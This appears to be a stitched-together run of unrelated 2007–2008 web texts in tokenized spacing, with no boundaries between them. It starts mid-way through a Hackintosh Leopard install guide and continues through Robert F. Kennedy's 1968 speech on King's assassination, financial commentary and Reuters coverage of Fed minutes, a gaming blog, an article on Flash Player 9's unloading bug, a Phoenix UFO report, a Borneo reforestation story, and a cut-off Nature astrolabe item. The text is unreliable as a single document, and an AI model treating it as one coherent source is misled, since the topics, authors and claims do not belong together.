DMG= " / Users/adam/Desktop/osx-leopard105.dmg "
While we 're at it , let 's edit the 9a581 PostPatch.sh file as well .
This time , edit the fourth and fifth lines at the top of the file to look like this :
PATCH= " / Volumes / LeopardPatch / leopatch / " # path to the patched extensions
LEO= " / Volumes / Leopard " # path to Leopard installation
Advertisement
Save and close both files .
Finally , it 's time to patch the DVD .
Open up Terminal , type sudo -s , then enter your administrative password ( your login password ) .
Then type cd Desktop and hit Enter .
Now you 're ready to apply the patch .
Keep in mind that you 'll need plenty of space on your hard drive to perform the patch .
I had around 20 GB of free space when I did it , though I 'm sure you could get away with less .
To execute the patch , type :
./9a581-patch.sh
and hit Enter .
The patch will now execute , which means you 've got some time on your hands .
You 've been working your ass off up until this point , though , so kick back and relax for a bit .
I did n't have a clock on it , but I 'm pretty sure the patch took at least an hour on my MacBook Pro .
Advertisement
If you have trouble with the patch and you 've got less free space , try freeing up some hard drive space and trying again .
When the patch has successfully completed , you should see a new file on your desktop : Leo_Patched_DVD.iso weighing in somewhere around 4,698,669,056 bytes .
Now we 've got to burn this image to a DVD .
Advertisement
Luckily the patch removes lots of unnecessary files so we 've shrunk the almost 7GB install DVD to 4.38 GB , just enough to fit on a single - layer DVD .
To burn the image , insert a blank DVD , open up Disk Utility , select the Leopard_Patched_DVD.iso file in the sidebar , and then click the Burn button .
Once it 's finished , you 're finally ready to proceed to the installation .
But just one more thing before you do .
Copy the patch files that we just unzipped from your desktop to a USB thumb drive and name the drive LeopardPatch .
We 'll need these files for the post - installation patch that we 'll apply later .
Advertisement
Installation
If you 've followed all of the steps up to this point , you should now be ready to fire up the patched Leopard install DVD .
So power on your Hackintosh , insert the DVD , and let the boot process begin ( you did remember to set the DVD drive as the first boot device , right ? ) .
You 'll be prompted to press any key to start the installation or hit F8 for options .
Hit F8 .
Advertisement
You 'll now see the boot : prompt .
Enter -v -x and press Enter .
( Do n't ask me why , but this is the only way the install DVD would boot for me .
Not using these options caused the boot to hang indefinitely every time . )
You should now see lots of text scrolling over your monitor .
You may even see some daunting errors .
Do n't be alarmed ; just let it continue .
After several minutes , the graphical Leopard installer should be staring you in the face .
Advertisement
Format the install drive : I know that you 're raring to install now that you 're finally here , but there 's one thing we need to do first : Format our hard drive so that it 's prepared to receive the Leopard installation .
So go to Utilities in the menu bar and select Disk Utility ( if you do n't have a working mouse yet , you can still access the menu bar from the keyboard ) .
Once Disk Utility fires up , it 's time to format the drive .
Here 's how :
Advertisement
Select your hard drive in the left sidebar .
Click on the tab labeled Partition .
Select a 1 partition Volume Scheme , name the volume Leopard , and choose Mac OS Extended ( Journaled ) as the format .
Last , click the Options button and choose Master Boot Record as the partition scheme .
Advertisement
Now that your drive is ready , so are you .
Install Leopard :
This really is the easiest part - just follow the on - screen instructions and choose your newly created Leopard partition as the install destination .
Then , before you make that final click on the Install button , click Customize and de-select Additional Fonts , Language Translations , and X11 .
These components were removed so we could fit everything on the patched DVD , so we wo n't be installing them now .
Advertisement
Now you 're ready .
Click install and grab a quick drink .
In around 10 minutes , Leopard should have installed , leaving you with just one more step before you 're running with the Leopard .
Advertisement
After the installation completes , your computer will automatically restart .
Unfortunately you 're not ready to boot into Leopard just yet - you 've got one thing left to do .
So insert the thumb drive you copied the patches to and , just like last time , hit F8 when prompted by the DVD .
Again , enter - v -x at the boot prompt and hit Enter .
When the install disc finally loads , go to Utilities in the menu bar and select Terminal .
It 's time to apply the post - install patch .
Advertisement
When terminal loads , type cd / Volumes / LeopardPatch at the prompt and hit Enter to navigate to the patch directory .
Now , just like when you patched the install disc , type :
./9a581PostPatch.sh
... and hit Enter .
The script will move and copy files about ( answer yes when prompted ) , and when it 's finished , you 'll be prompted to restart your computer .
When your computer reboots this time , you 're ready .
It 's time to boot into Leopard .
Advertisement
OSx86 on Your Hackintosh
Let your computer reboot , but be sure to leave the install DVD in the drive .
When the DVD prompts this time , just let the countdown time out .
When it does , your installation of Leopard will automatically boot up .
You 've done it !
Advertisement
From this point forward , you 're running Leopard on your PC just as though you were running Leopard on a regular Mac .
You 'll be jubilantly welcomed in a handful of languages as if Steve Jobs himself is shaking your hand for a job well done .
All of your hardware should work exactly as you 'd expect .
Your sound , networking , and video will all work off the bat .
( I have n't tested the motherboard 's built - in wireless yet , but it reportedly works . )
Your iPods will sync flawlessly , and CDs and DVDs read and burn just as you 'd expect .
Advertisement
On the software front , Mail , Address Book , iTunes , and everything else I 've tried so far work flawlessly .
Firefox is browsing , Quicksilver is doing its thing , Spaces are rocking , Stacks are stacking , Cover Flow is flowing , and Quick Look is previewing .
I have n't tried Time Machine yet , but the patch we used reportedly works with Time Machine as well .
UPDATE : After you complete your install the first go round , here 's how to upgrade to OS X 10.5.1 ( the first update to Leopard ) in just a few simple steps .
Advertisement
Upgrade Your Hackintosh to OS X 10.5.1
Click to viewA couple of weeks ago , I detailed how I built a Hackintosh Mac on the cheap from …
Read more
But Really , How Does It Work ?
Advertisement
I 'm still stretching my legs in this new build , and I 'm planning on bringing some benchmarks to the table soon so you have a better idea how this machine matches up to its Mac counterparts , but so far it 's running like a champ .
UPDATE : I benchmarked my Hackintosh against a Mac Pro and MacBook Pro and it stood up very well .
Check out the benchmarks here .
The only problem with the install at the moment is that it wo n't boot without the Leopard DVD in the DVD drive at boot - meaning that every time you reboot you 'll need to make sure that the Leopard DVD is sitting in the DVD drive .
It 's not a dealbreaker for me by any means , but it 's an annoyance .
I 've found one post suggesting a workaround at the OSx86 forums ( near the bottom of the first post in the thread ) , but I have n't tried it yet .
If and when I do , I 'll be sure to post an update .
Advertisement
And that 's that .
It 's a chore to set up , to be sure , but it's also the most powerful Mac per dollar I 've ever used .
If you 've got any experience building a Hackintosh of your own or you 've got any questions , let 's hear them in the comments .
Adam Pash is a senior editor for Lifehacker who loves a good hack and cherishes his Macintosh , so building a Hackintosh was a perfect fit .
His special feature Hack Attack appears every Tuesday on Lifehacker .
Subscribe to the Hack Attack RSS feed to get new installments in your newsreader .
R obert F .
K ennedy Remarks on the Assassination of Martin Luther King , Jr. delivered 4 April 1968 , Indianapolis , IN Video Purchase Audio mp3 of Address Plug - in required for flash audio
Your browser does not support the audio element .
click for pdf [ AUTHENTICITY CERTIFIED :
Text version below transcribed directly from audio . ( 2 ) ]
Ladies and Gentlemen , I 'm only going to talk to you just for a minute or so this evening , because I have some -- some very sad news for all of you -- Could you lower those signs , please ? --
I have some very sad news for all of you , and , I think , sad news for all of our fellow citizens , and people who love peace all over the world ; and that is that Martin Luther King was shot and was killed tonight in Memphis , Tennessee .
Martin Luther King dedicated his life to love and to justice between fellow human beings .
He died in the cause of that effort .
In this difficult day , in this difficult time for the United States , it 's perhaps well to ask what kind of a nation we are and what direction we want to move in .
For those of you who are black -- considering the evidence evidently is that there were white people who were responsible -- you can be filled with bitterness , and with hatred , and a desire for revenge .
We can move in that direction as a country , in greater polarization -- black people amongst blacks , and white amongst whites , filled with hatred toward one another .
Or we can make an effort , as Martin Luther King did , to understand , and to comprehend , and replace that violence , that stain of bloodshed that has spread across our land , with an effort to understand , compassion , and love .
For those of you who are black and are tempted to fill with -- be filled with hatred and mistrust of the injustice of such an act , against all white people , I would only say that I can also feel in my own heart the same kind of feeling .
I had a member of my family killed , but he was killed by a white man .
But we have to make an effort in the United States .
We have to make an effort to understand , to get beyond , or go beyond these rather difficult times .
My favorite poem , my -- my favorite poet was Aeschylus .
And he once wrote :
Even in our sleep , pain which cannot forget
falls drop by drop upon the heart ,
until , in our own despair ,
against our will ,
comes wisdom
through the awful grace of God .
What we need in the United States is not division ; what we need in the United States is not hatred ; what we need in the United States is not violence and lawlessness , but is love , and wisdom , and compassion toward one another ; and a feeling of justice toward those who still suffer within our country , whether they be white or whether they be black .
So I ask you tonight to return home , to say a prayer for the family of Martin Luther King -- yeah , it 's true -- but more importantly to say a prayer for our own country , which all of us love -- a prayer for understanding and that compassion of which I spoke .
We can do well in this country .
We will have difficult times .
We 've had difficult times in the past , but we -- and we will have difficult times in the future .
It is not the end of violence ; it is not the end of lawlessness ; and it's not the end of disorder .
But the vast majority of white people and the vast majority of black people in this country want to live together , want to improve the quality of our life , and want justice for all human beings that abide in our land .
And let 's dedicate ourselves to what the Greeks wrote so many years ago : to tame the savageness of man and make gentle the life of this world .
Let us dedicate ourselves to that , and say a prayer for our country and for our people .
Thank you very much .
Book / CDs by Michael E. Eidenmuller , Published by McGraw - Hill ( 2008 ) See Also : Documentary entitled " Ripple of Hope . " Audio Source : John F. Kennedy Presidential Library and Museum Also in this database : Edward Kennedy - Eulogy for Robert F. Kennedy Page Updated : 12/22/19 U.S. Copyright Status :
This text = Property of A merican R hetoric.com .
Audio = Public domain .
Image ( Screen shot ) = Uncertain .
Opinion
James Grant :
The scary part is concern about value of dollar itself Fed forgetting U.S. holds the world 's reserve currency
Panic is old hat on Wall Street .
Rarely before , however , has there been a crisis so comprehensive as this one .
It first materialized last summer in the shape of a disturbance in the low - rated , or subprime , mortgage market .
" Contained , " the regulatory establishment hopefully pronounced .
But it has blazed across markets and time zones , with central bankers , politicians and Treasury functionaries in hot and , to date , futile pursuit .
What makes these proceedings so frightening is that not only is credit in crisis but so , too , is money .
There are well - founded doubts about the promises to pay money and about the nature and integrity of the dollar itself .
So it was on Friday that the Federal Reserve committed to lend undisclosed billions to bail out Bear Stearns , a top Wall Street purveyor of mortgage - backed securities and a leading lender to hedge funds .
Where will the Fed find these dollars ?
Where it always , ultimately , does .
It will have to print them , despite abundant evidence from the currency and gold markets that the world has just about all the dollar bills it cares to hold .
By the looks of things , America 's surfeited creditors must make room for many billions more .
The markets are in " uncharted waters , " Robert Rubin , chairman of the Citigroup Executive Committee , said in a speech Friday .
He urged the government to exert itself on behalf of the mortgage market and the American homeowner .
And who are these bankers who went sailing off the end of the Earth and thereby find it necessary to pass the cup to the government ?
The company of errant , if lavishly compensated , navigators includes none other than Rubin himself .
Last fall , the former Treasury secretary confessed to Fortune magazine that until the mortgage storms broke over his head in the summer of 2007 , he was unfamiliar with the kinds of complex mortgage structures with which Citi 's own balance sheet was packed .
Almost certainly , the gulf between competence and compensation on Wall Street has never been wider .
These lapses in mortgage underwriting are justly called " the biggest failure of ratings and risk management ever . "
But mortgages are far from the only blighted department of credit .
The same carefree lending standards that led to record - high home foreclosures have brought deepening troubles in the market for loans to highly indebted companies .
The " no -doc , " interest - only , no - money - down mortgage turns out to have been a kind of universal American business model .
It would n't be so bad if the United States were not the issuer of the world 's reserve currency .
The dollar is not only America 's scrip but also a store of value and a medium of exchange in Asia , South America and the Middle East .
Yet — and here is the rub — the Federal Reserve makes monetary policy for one country only .
Back in 2002 - 03 , Ben Bernanke , then a Fed governor serving under Alan Greenspan , got it into his head to scotch " deflation . "
Low , and lower , everyday prices were a clear and present danger , he claimed .
Concurring , Greenspan led a campaign to reinstitute a decent rate of inflation by slashing the federal funds rate to 1 percent .
Wall Street did not need to be told twice what glorious vistas for moneymaking such rock - bottom borrowing costs opened up , and it set to work creating junk bonds , mortgage - backed securities , leveraged bank loans and the rest .
Naturally , real estate prices took flight .
Lenders and borrowers are forever prone to overdo it , then to underdo it .
One day , anybody can get a loan .
Next thing you know , the chairman of Countrywide Financial is explaining himself before a hostile congressional committee and the formerly carefree credit markets are in tears .
The tears are all the more bitter today because the world is losing faith in the paper dollar .
Americans enjoy the inestimable privilege of consuming much more than they produce and financing the difference with the currency they alone can lawfully print .
The reports about the record - high euro or the post - 1995 - high yen mean that we privileged ones will soon have to start spending less and working more .
The crux of the problem is that the Fed sets its interest rate for this economy and none other .
Inflation is rampant in the countries that lash their currencies to ours .
The last thing that China or Saudi Arabia or Qatar needs is a still easier , more inflationary , monetary policy .
But the Fed — its eye not on the worldwide inflation rate but on the Bear Stearns share price — is about to turn still easier .
It 's a pickle for the ages but not one without its compensations .
For one thing , the falling prices on Wall Street are at last beginning to restore a semblance of value to stocks and bonds .
For another , the plunging dollar may prompt a serious re-examination of worldwide monetary arrangements .
There must be a better way .
Grant , the author of " Money of the Mind , " is editor of Grant 's Interest Rate Observer .
This article originally appeared in The Washington Post .
1. I am Unicode , thy character set .
Thou shalt have no other character sets before me .
2 . Thou shalt carefully specify the character encoding and the character set whenever reading a text file .
3 . Thou shalt not refer to any 8 - bit character set as “ ASCII ” .
4 . Thou shalt ensure that all string handling functions fully support characters from beyond the Basic Multilingual Plane .
Thou shalt not refer to Unicode as a two - byte character set .
5 . Thou shalt plan for additions of future characters to Unicode .
6 . Thou shalt count and index Unicode characters , not UTF - 16 code points .
7 . Thou shalt use UTF - 8 as the preferred encoding wherever possible .
8 . Thou shalt generate all text in Normalization Form C whenever possible .
9 . Thou shalt avoid deprecated characters .
10 .
Thou shalt not enter the private use area .
WASHINGTON ( Reuters ) - Members of the Federal Reserve ’s policy - setting committee worried at their most recent meeting that housing and financial market stress could trigger a nasty slide in the economy , even as inflation pushed higher , minutes of the meeting released on Tuesday show .
The U.S. Federal Reserve Building is pictured in Washington , March 18 , 2008 .
REUTERS / Jason Reed
“ Some believed that a prolonged and severe economic downturn could not be ruled out given the further restriction of credit availability and ongoing weakness in the housing market , ” minutes of the March 18 meeting said .
Fed economists presented a somber picture of short - term prospects -- central bank staff now fully expect negative growth over the first six months of the year -- but held out the possibility of a modest rebound later .
“ The staff projection showed a contraction of real GDP in the first half of 2008 followed by a slow rise in the second half , ” the report said , referring to gross domestic product , a broad measure of a country ’s output of goods and services .
At the same time , Fed officials found recent inflation reports “ disappointing , ” noting also with concern that some indicators of inflation expectations were edging higher .
HARD TO SET POLICY
Policy - makers said there were limits to what could be done through interest rate cuts to deal with problems underlying the housing and financial market turmoil , but agreed trimming borrowing costs might provide some help .
However , Fed officials said it would be hard to calibrate policy responses because their aggressive rate cuts in recent months would take some time to show their effect on economic activity .
The Fed has cut U.S. overnight target interest rates by three percentage points to 2.25 percent since September .
Interest rates futures showed the implied prospects for the Fed to trim its benchmark lending rate by a half - percentage point in April , to 1.75 percent , rose toward 50 percent from 40 percent earlier , and 32 percent on Monday .
Rate futures now see a 1.75 - percent funds rate as almost certain by the June meeting of the policy - setting Federal Open Market Committee , and have started to price in a chance that rates could be cut as low as 1.5 percent this year .
U.S. stocks .
DJI.SPX.IXIC extended declines after the Fed minutes were released .
Treasury debt prices gained as investors sought safety , and the dollar fell against the yen .
“ Some of the words I see are a bit troubling , ” said Richard Sichel , chief investment officer at Philadelphia Trust Co in Philadelphia .
“ Some of their thoughts were maybe more negative than we might have believed at that point . ”
The Fed also said that while exports were getting a boost from a cheapening U.S. dollar , there also was a risk that the devalued greenback will further add to inflationary pressures from costlier oil and other commodities .
At the same time , slower global growth -- where major economies are also feeling the effects of financial turmoil and slower U.S. growth -- could limit the support exports have been providing , the central bank said .
WORRIED SETTING PRECEDENT
Faced with renewed deterioration in credit conditions in March , the Fed unleashed a rare string of special measures aimed at pumping liquidity into malfunctioning financial markets .
Minutes of a March 10 conference call that preceded announcement of a facility that made ultra-safe Treasury securities available to primary dealers in exchange for riskier assets showed policy - makers worrying that financial markets might grow dependent on special Fed liquidity actions .
“ On balance , the committee decided that the facility could prove useful in preventing an escalation of an unhealthy dynamic that was developing in money and credit markets , ” the minutes said .
The minutes contain only a brief mention of the March 16 decision to approve the financing arrangement in which the Fed agreed to provide a $ 30 billion credit line backed by the shaky assets of troubled investment bank Bear Stearns BSC.N to facilitate that firm 's acquisition by rival JPMorgan Chase JPM.N .
The report explained why two members dissented from the March decision to cut rates by three - quarters of a percentage point .
Both worried that more rate cuts could unhinge inflation expectations , which are critical to policy - makers because as long as expectations remain well anchored , the central bank can allow inflation to rise slightly while it lowers rates because markets believe inflation will soon be brought in check .
Dallas Fed President Richard Fisher believed the Fed should focus on liquidity measures to improve economic prospects rather than more rate cuts .
Philadelphia Fed President Charles Plosser said the Fed could not afford to wait for clear evidence that inflation expectations have become unmoored because by then it would be too late to contain inflation pressures .
Posted by Doomeru Woebashi at on Monday , April 14 , 2008
We here at Resigned Gamer have been reeling from the increased traffic and attention we 've gotten since being posted on both G4 and Kotaku .
Our mom is certainly proud of us .
I was planning to respond to some comments on my Crisis Core post that I found on reddit , but I think I can address them in what I 'm writing today .
We started this site to write about the games we play .
Not good or bad , just whatever was spinning in the drive ( no offense to our solid state DS friends ) .
The point is that we 've been doing this our whole lives and it's gotten to the point where we find ourselves playing stuff just for the sake of playing something ; anything .
So what you 'll often find on this site is really an attempt to rationalize the whole time - wasting enterprise of being a gamer .
We do n't get review copies of anything so more often then not what we review is n't current , plus we both have a backlog of stuff to get through so even when we buy a new game there 's other stuff to win before we can get to it .
Also we have jobs and girlfriends .
So how do we review the games we own and still remain relevant ?
Our game reviews do n't dick around a lot , I think it 's safe to say .
You can go elsewhere to read the plot synopsis or the developer 's history .
I could tell you but I just do n't care that much .
I 'll mention if the plot is crap or not , or if it enhances the gameplay , but I just do n't see the point when anyone who makes their way to our site probably already knows all that stuff already .
Sir Cucumber and I concern ourselves with the details that affect us the most as we play a particular game .
Instead of developing a tolerance , years of banging our heads against the same blatant design mistakes has heightened our sensitivity to things that ruin a game 's experience .
This is why we hate turn - based strat games with unskippable animations , game menus with 15 steps before you can even start , run -and - gun action games that make you press a button to pick up items on the ground , and unsortable inventory systems .
There are other reviewers that note this stuff , but not many and these game - breaking details get lost in mainstream reviews that have to cover the gist of the game and get straight to the score , or grade , or whatever metric EGM pulls out of their collective ass these days .
I guess the only direct response I have to the commenters on reddit would be that Crisis Core is indeed a high quality production , but no amount of time spent with the game will fix the broken and misguided roulette system .
I 'm not sure how one can derive from my review that I only spent a few hours with the title .
Hour one and hour nine are filled with the same unskippable " random " materia cinemas .
I probably should have expected some run -of - the - mill Final Fantasy fanboy sniping , and I guess I 'd feel a bit testy as well after watching Square rape the festering carcass of FF7 through every available orifice , including a cell phone game .
But at least the game loads quickly ... On a modded PSP ...
Let us know if there are any games you 'd like to see covered .
Yahtzee might not appreciate requests but we sure do .
UPDATE :
Update : Adobe has added the Loader.unloadAndStop method to Flash player 10 to address some of the issues outlined in this article .
You can find more details on this feature in my article “ Additional Information on Loader.unloadAndStop “ .
Flash Player 9 has a very dirty secret .
It does n’t even try hide this dirty secret , but it ’s still not that widely known .
You see , Flash Player has severe problems with separation anxiety – once it ’s loaded some content , it has a really hard time ever letting it go .
Technically speaking , it is extremely difficult to make Flash Player 9 unload ActionScript 3 content .
In this article , I ’ll take an in - depth look at the issue , it ’s implications , suggestions for addressing the problem in the player , and some workarounds for the time being .
If this issue seems like it will impact your projects , I ’d strongly encourage you to read through the article and educate yourself , then use the link at the end of the article to provide Adobe with feedback on it .
Likewise , I would encourage you to share this issue with other developers , both to help spread awareness of the issue , and to give them the opportunity to also provide feedback to the Flash Player team .
I see this as one of the most critical issues that should be solved in Flash Player 10 , and the more people raise it as an issue with Adobe , the more likely it is to be addressed .
In my opinion , this issue breaks down into three problems : A major player bug , content sandboxing , and explicit unload functionality .
Note that these issues affect content created with both Flex 2/3 and Flash CS3 .
Background
First , a little bit of info on the AVM2 garbage collector for those who have n’t read my previous articles about resource management in player 9 . With ActionScript 2 content , calling MovieClip.unloadMovie ( ) explicitly removes the contents of a MovieClip .
This meant that your loaded content would immediately stop executing , and be removed from memory .
In AS3 , calling Loader.unload ( ) simply removes the reference to the loaded movie .
If any other references exist to the loaded content , it will not be unloaded .
Even when all references are removed , it only frees the content for collection by the garbage collector at some indeterminate point in the future .
This means that even if everything worked as expected the loaded content will continue to execute , and remain in memory for an indeterminate amount of time after you unload it .
This is problematic in many ways , but it is made worse by a bug in the player .
Flash Player 9 Bug
Flash Player 9 has a critical bug that prevents unloading loaded SWFs that have any active ENTER_FRAME or TIMER event listeners .
This occurs regardless of whether these listeners are all within the scope of the loaded SWF , or even if they all use weak references .
This also affect timeline code written in Flash authoring – if you have any code in your timeline , it will not be possible to unload that SWF .
Content Sandboxing
AS3 lacks any support for explicit content sandboxing .
By this , I am referring the ability for a developer to load a SWF into a sandbox , so that the loaded content ca n’t reach back into the loading application .
This would be a very useful for a number of reasons , including loading third party modules or plug-ins without having to worry about them messing with things in your application .
More important to this article though are the implications on unloading loaded content .
Firstly , content sandboxing would allow a developer to prevent a loaded SWF from adding listeners outside of its scope .
This is important , because developers rely on stage events in AS3 for notification of things like global mouse movements , and key presses , but creating a stage listener from a loaded SWF will prevent it from ever being unloaded ( unless it uses weak referencing ) .
This is because addEventListener creates a reference back to the listener from the event dispatcher ( in this case , the stage ) .
This means that your content might never unload , and it means that third party content can ( intentionally or not ) prevent itself being unloaded by simply adding a stage listener .
Secondly , content sandboxing would allow the player to keep loaded content in a nice clean package , which I imagine would make explicit unloading possible .
Explicit Unloading
As outlined in the background section , there is no way to explicitly unload loaded SWFs in AS3 , which was very simple in AS2 .
There is a good reason for this â content can be referenced , instantiated , and re-parented across SWF boundaries in ActionScript 3 .
This makes unloading content much more complicated than it was in ActionScript 2 .
Still , the lack of this capability is a major downgrade from AS2 , and makes some types of projects nigh on impossible .
I believe that content sandboxing would help address this issue , making it much easier to remove loaded content .
Adobe could restrict the ability to explicitly unload SWFs to sandboxed content .
For most applications that rely on loading and unloading content dynamically ( galleries , for example ) this would be an adequate solution .
Implications
These issues have some major implications , that affect three types of projects in particular :
Gallery or portfolio projects .
Some of you may have noticed that incomplet.org [ Moved to incomplet.gskinner.com ] stagnated as soon as AS3 was released .
This is because it ’s virtually impossible to create a site like incomplet.org in AS3 .
Because loaded content cannot be easily unloaded , it would mean that experiments would continue to run in the background after users clicked off of them .
The whole site would slow to a crawl , and eventually crash .
Not good .
This is also the reason that in my upcoming FitC talk , I will likely have to resort to running my demos externally , instead of dynamically loading them and displaying them in the slides .
Most likely this will prevent me from sharing my slides online as well , which is something I have been doing for years .
Applications that load third party content .
Any application that loads plug-ins , modules , or content from third parties is currently very problematic to develop .
In order to do so , each piece of content must adhere to a strict coding standard , and expose a common API for deactivating the content .
I feel there is also a bit of a security issue here , because the third party content can add a stage listener to prevent itself from being unloaded , then monitor all key and mouse interactions .
Advertising .
It ’s currently impossible to safely embed AS3 based advertising into an AS3 based site .
Most advertising uses timeline code , enterframe listeners , and timers , so if you have rotating banner ads loading into your Flash site , old banners will never stop executing or be removed from memory .
Worse yet , if the banners are being served from within your domain , they pose a major security risk , as outlined in # 2 above .
Part of what makes this so important is that it entails a reduction of capability from player 8 and AS2 .
It ’s also weird messaging for Adobe , that Flash is awesome for building online experiences , and it ’s great for creating online advertising , but it is n’t suitable for developing online experiences with advertising .
It will also become increasing important as Flash / Flex sites become more modular , and with increased use of third party content and embedded ads .
Proposal for the Flash Player
At a minimum , I ’d like to see the player bug resolved as soon as possible .
I also do n’t think it ’s unreasonable to hope for some support for content sandboxing and explicit unloading for player 10 .
The API already has nice hooks for it .
To enable content sandboxing , Adobe could simply extend SecurityDomain to work similarly to ApplicationDomain , allowing developers to put loaded content into a new security domain , so that it cannot access the loading SWF .
The nice things about this is that it would n’t require any new APIs , it would mirror an existing model , and there are already mechanism for dealing with this ( this is essentially what happens when you load a SWF from another domain ) .
We also already have a nice model for communicating with sandboxed content with childSandboxBridge and sharedEvents .
For explicit unloads , I would suggest simply adding a Loader.dispose ( ) or Loader.remove ( ) method .
This could work just with sandboxed content , and throw an error if the content cannot be removed .
These changes would n’t directly solve every issue , but they would give developers the tools to address all the major problems themselves .
Work - Arounds and Strategies
There are four main things you can do to address these issues now :
Make sure that you are always removing timer and enterframe event listeners in content you may want to load into a larger application .
Also , try to avoid stage listeners where possible , and remove them immediately when you are done with them .
Expose a standard API in your SWFs that allows other SWFs to tell it to clean up and stop executing .
This way , the loading application can call this method ( within a try / catch block ) before it unloads any content .
I would suggest a .halt ( ) method , backed by a listener for a “ halt ” event through sharedEvents .
You can load content SWFs from a subdomain .
This will place it into a security sandbox implicitly .
Load content into a div layered over your main application .
This is n’t a great option , but it addresses almost all of the issues .
Providing Feedback to the Player Team
If you ’d like to provide feedback to the Flash Player team on this or other issues , you can do so at this URL :
http://www.adobe.com/bin/fp8betafeedback.cgi
The player team is a group of smart , dedicated people , who are genuinely interested in what you have to say .
They read every submission they get from that form .
If you do contact them about this issue , feel free to point them to this page for the explanation , but also let them know how this issue might impact your work .
By Ray Stern
Air traffic controllers in the main tower of Phoenix Sky Harbor International Airport saw last night 's bizarre spectacle of red lights flying across North Valley skies , but the Federal Aviation Administration wo n't let them talk to the media .
Ian Gregor , FAA regional spokesman , says the agency 's policy wo n't allow controllers to comment even if they want to relate their experience .
Gregor confirmed that " several " air traffic controllers in the tower saw the staggered formation of mysterious lights moving in the sky , apparently over North Phoenix .
He says he heard that second - hand , though — the tower 's manager told him about it .
The controllers did n't consider the source of the lights to be a hazard , because nothing was popping up on radar , Gregor says .
Several media outlets are displaying photographs of the lights taken by Valley residents , which seems to confirm that something was up there .
Heck , the Republic even quoted no less an eminent source than one of its own reporters , Anne Ryman , as having eyewitnessed the event .
Photos and videos can be seen today on www.azcentral.com.
The lights have defied quick explanation .
Even the Sky Harbor lookouts had " no idea " what the darned things were , Gregor says .
Yet it seems clear air traffic controllers could offer a professional description of the UFOs , since they are , presumably , experts at spotting distant aircraft .
Their guesses at the altitude , distance , speed and physical nature ( if any ) of the UFOs would carry more weight than those of the average skywatcher .
Gregor wo n't budge , though .
" This has nothing to do with the FAA , " he says .
New Times has filed a formal request with the FAA for radar records of any unidentified aircraft in the area from the agency 's Albuquerque and Phoenix - area radar centers , just in case anything was missed .
The sky was clear last night , so the lights apparently were n't reflections from a source on the ground .
Aircraft would have shown up on radar .
Military stealth aircraft would be unlikely to be covered in brilliant red lights .
So would alien spacecraft , in this writer 's humble opinion .
You take the time to fly thousands , if not millions , of light years across space to Earth , only to put on a relatively boring air show ?
What hosers , these aliens !
They can't even seem to give us a missing man formation , much less the secret to a long - lasting technological civilization .
These new lights may be more mysterious than the V - shaped formation over Phoenix that caused a stir in 1997 .
After that sighting , the military confirmed there were aircraft dropping flares near the Phoenix area , and New Times reported that a local guy named Mitch Stanley looked at the source of the lights with his telescope and saw — airplanes .
His description of squared - off wings gibed with a type of ground - attack airplane called an A - 10 Warthog , the same type the military said had been in the area that night .
I did n't see the famed Phoenix Lights , but it makes sense to me that if they might have been A - 10s , they probably were .
I 'd like a rational explanation for these new lights , and soon — because the media abhors a vacuum .
And there are plently of people who will come out the woodwork to fill that vacuum with all sorts of ungrounded nonsense .
Paradise Valley resident Lynn Kitei , who has made a career out of the 1997 lights , is a case study in how much bull can be packed into a few unidentified lights : " Kitei 's research goes far beyond UFOs , " says a 2006 East Valley Tribune article .
" She said she believes ghosts , UFOs and other unexplained phenomena are all connected . "
Still , even skeptics like me can't shake their curiosity about things like this .
To paraphrase Carl Sagan , incredible claims require incredibly good evidence .
So far , there 's just no telling whether these lights represented actual aircraft , reflections , weather - related phenomena , Satan , incorporeal alien life or mass hysteria ( sorry , Anne ) .
Stay tuned .
Six years ago the area around Samboja in Borneo was like much of the world 's tropical rainforest : denuded .
The trees had been cut for timber , the land burnt , and in place of what should be some of the richest biodiversity on the planet were thousands of acres of grass .
But from this ruined landscape a fresh forest has been grown , teeming with insects , birds and animals , and cooled by the return of moist clouds and rain .
It is a feat that has been hailed by scientists and offers hope for disappearing and ruined rainforests around the world .
The secret was to use more than 1,300 species of local tree and a fertiliser made with cow urine , says Dr Willie Smits , the Indonesian forestry expert who led the replanting .
' The place became the scene of an ecological miracle , a fairytale come true , ' says Smits , who has written a book about the project .
Rainforests are home to half the world 's 10 million species of plants , animals and insects , store more carbon than the Earth 's atmosphere , clean air and water and regulate temperatures and rains .
But the UN estimates that every day more than 14,000 hectares ( 34,900 acres ) of primary rainforest are cut down for timber or to make way for crops such as palm oil in south east Asia and soya in South America - a figure campaigners warn is ' conservative ' .
The area around the small town of Samboja was like a ' moonscape ' when Smits first visited it nearly a decade ago .
The rainforest had been cut and burnt and was covered with grasses .
Without the forest , the rains disappeared and temperatures rose : streams dried up , harvests failed , fires broke out , jobs disappeared and ill health soared .
' The only thing I saw was this huge sea of yellow , waving grass ; there was wind , but there was no rustling of leaves , ' Smits said .
' There were no birds , not even insects , nothing but this damned grass . '
Smits raised money to buy 5,000 acres and six years ago set about planting seeds collected from more than 1,300 species of tree , more even than would have lived in the original forest .
These were planted with a special ' micro- biological agent ' made from sugar , excrement , food waste and sawdust - and cow urine .
Planting finishes this year , but already Smits and his team from the Borneo Orang - utan Survival Foundation charity claim the forest is ' mature ' , with trees up to 35 metres high .
Cloud cover has increased by 12 per cent , rainfall by a quarter , and temperatures have dropped 3 - 5C , helping people and wildlife to thrive , says Smits .
Nine species of primate have also returned , including the threatened orang - utans .
' If you walk there now , 116 bird species have found a place to live , there are more than 30 types of mammal , insects are there .
The whole system is coming to life .
I knew what I was trying to do , but the force of nature has totally surprised me . '
People have also benefited from being given land around the forest to plant sugar and other crops , providing food and income .
' It was the poorest district in the area , now it 's above average , ' said Smits .
' It can be done anywhere .
The principles are that you must have scientifically sound approaches , work with local trees , and you have to have the respect of local people - that 's the key . '
· ' Thinkers of the Jungle - The Orang - utan Report ' by Gerd Schuster , Willie Smits and Jay Ullal , is published by HF Ullmann , £ 29.99
Published online 2 April 2008 | Nature | doi:10.1038/news.2008.730
News
UK museum seeks cash to keep a rare astrolabe in public hands .
The British Museum needs £ 350,000 to secure this astrolabe .
Museums , Libraries and Archives Council
The fate of a fourteenth - century pocket calculator is hanging in the balance between museum ownership and private sale .
The device is a brass astrolabe quadrant that opens a new window on the mathematical and astronomical literacy of the Middle Ages , experts say .
It can tell the time from the position of the Sun , calculate the heights of tall objects , and work out the date of Easter .
Found in 2005 , the instrument has captivated experts .
Now they hope to keep it in public hands — not just to ensure future access to it for researchers , but because it is deemed an item of national cultural importance .
Saved from sale
